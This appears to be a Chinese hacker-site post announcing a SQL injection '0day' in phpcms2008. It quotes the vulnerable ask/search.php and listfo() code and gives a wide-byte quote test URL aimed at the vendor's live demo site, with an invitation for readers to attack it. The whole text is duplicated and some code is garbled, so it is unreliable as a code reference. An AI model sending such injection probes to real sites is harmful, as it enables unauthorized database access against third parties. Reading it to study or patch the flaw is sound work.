phpcms2008注射0day
网站建设 2023-02-09 11:06www.1681989.com免费网站
中秋节到了,这里我送上phpcms2008的一枚注射漏洞!!希望各位朋友多多支持本站啊~~
漏洞存在于ask/search.php文件,以下是漏洞代码
if($keywords)
{
$where .= " AND title LIKE '%$keywords%'";
}
$fos = $ask->listfo($where, 'askid DESC', $page, 20);
下面我们来看看listfo()过程的代码
function listfo($where = '', $order = '', $page = 1, $pagesize = 50)
{
if($where) $where = " WHERE $where";
if($order) $order = " ORDER BY $order";
$page = max(tval($page), 1);
$offset = $pagesize($page-1);
$limit = " LIMIT $offset, $pagesize";
$r = $this->db->get_one("SELECT count() as number FROM $this->table $where");
Oh yeah!!注射漏洞就这么产生了,以下是测试语句
http://demo.phpcms./ask/search.php?keywords=蟎'
这是官方的演示站~~有兴趣的自己去叼~~88
漏洞存在于ask/search.php文件,以下是漏洞代码
if($keywords)
{
$where .= " AND title LIKE '%$keywords%'";
}
$fos = $ask->listfo($where, 'askid DESC', $page, 20);
下面我们来看看listfo()过程的代码
function listfo($where = '', $order = '', $page = 1, $pagesize = 50)
{
if($where) $where = " WHERE $where";
if($order) $order = " ORDER BY $order";
$page = max(tval($page), 1);
$offset = $pagesize($page-1);
$limit = " LIMIT $offset, $pagesize";
$r = $this->db->get_one("SELECT count() as number FROM $this->table $where");
Oh yeah!!注射漏洞就这么产生了,以下是测试语句
http://demo.phpcms./ask/search.php?keywords=蟎'
这是官方的演示站~~有兴趣的自己去叼~~88
上一篇:总结各大高手的提权思路
下一篇:黑客攻击数据库的六大手段